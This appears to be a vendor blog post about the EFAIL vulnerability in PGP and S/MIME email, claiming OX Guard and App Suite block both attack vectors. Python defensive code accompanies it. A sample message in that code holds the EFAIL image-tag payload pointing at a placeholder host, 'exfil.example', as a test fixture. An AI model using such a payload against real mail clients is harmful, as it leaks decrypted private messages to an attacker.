On Monday, a German and Belgian research team posted a paper demonstrating a potential vulnerability in PGP and S/MIME encrypted emails, named EFAIL. The described vulnerability may result in some email clients leaking the protected contents. This paper has been picked up by multiple media sources, and some of the early reporting was either incorrect or hyperbolic about the potential impact. Open-Xchange has been actively evaluating this potential vulnerability and is happy to announce that OX Guard does NOT appear to be vulnerable to the EFAIL attack.
First, let's clear up some misconceptions. This vulnerability does not cause your private key to be revealed. Encrypted items are safe until they are decrypted. And a bad actor must first have access to the encrypted item to modify it.
There are two attack vectors described in EFAIL. In the first attack vector, the modification is simple to execute: the encrypted PGP content is wrapped in an image tag. After decryption, the plaintext appears to the browser to be part of the image URL, which would send the decrypted content to the attacker. OX Guard is 100% effective in blocking this attack because, when it receives an email with encrypted content, it ignores any unencrypted content.
The second attack is much more difficult. For an attacker to succeed, they must be able to guess the first few words of the encrypted item. This makes attacks on plaintext PGP emails nearly impossible. For MIME-encrypted emails, however, the first few words that were encrypted are often the Content-Type header, which makes it more likely that an attacker can guess the first few bytes. Through a complex manipulation of the encrypted data, an attacker who knows those first few words can inject a short image tag at the beginning of the decrypted content, potentially sending the decrypted content to the attacker.
Open-Xchange's App Suite, however, doesn't just display any HTML content to the user. App Suite inspects HTML data for malicious code and rejects the malformed injected image tags, thus blocking this attack as well. We have worked hard for years to continuously improve how App Suite inspects and removes unsafe HTML content; this is an example of how good security practice can protect against threat vectors in unexpected ways.
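To make the two defenses described above concrete, here is an added example in Python (not OX Guard or App Suite code): a part-selection rule that drops every unencrypted sibling once a message contains an encrypted part, and a check that flags decrypted HTML referencing remote hosts so the client refuses to auto-load it. The sample message is constructed with placeholder ciphertext, and `exfil.example` is a made-up hostname.

```python
from email import message_from_bytes, policy
from html.parser import HTMLParser

# Constructed sample (placeholder ciphertext): an unencrypted HTML part beside a PGP/MIME part, the shape of the first vector.
SAMPLE = b"""Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="http://exfil.example/
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
placeholder-ciphertext-not-real
-----END PGP MESSAGE-----
--inner--
--outer--
"""

def parse_bytes(raw):
    return message_from_bytes(raw, policy=policy.default)

def renderable_parts(msg):
    """If any multipart/encrypted part is present, render only those and drop every
    unencrypted sibling (the behaviour the page describes); else render the leaves."""
    enc = [p for p in msg.walk() if p.get_content_type() == "multipart/encrypted"]
    return enc or [p for p in msg.walk() if not p.is_multipart()]

class RemoteRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.remote = []  # attribute values that would trigger a network fetch
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and (value or "").strip().lower().startswith(("http:", "https:", "//")):
                self.remote.append(value)

def remote_references(html):
    """Remote references in decrypted HTML; non-empty means do not auto-load."""
    finder = RemoteRefFinder()
    finder.feed(html)
    return finder.remote
```

Inline references such as `cid:` attachments are not flagged, so the check targets only content that would leave the client.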
Finally, even though it appears App Suite and OX Guard completely block EFAIL manipulation, we will be adding additional checks to further strengthen our defenses against attack.
If we discover anything additional to these findings with regard to EFAIL, we'll report back here immediately. In the meantime, users of Guard can continue to have trust in the integrity of the encrypted emails they send and receive.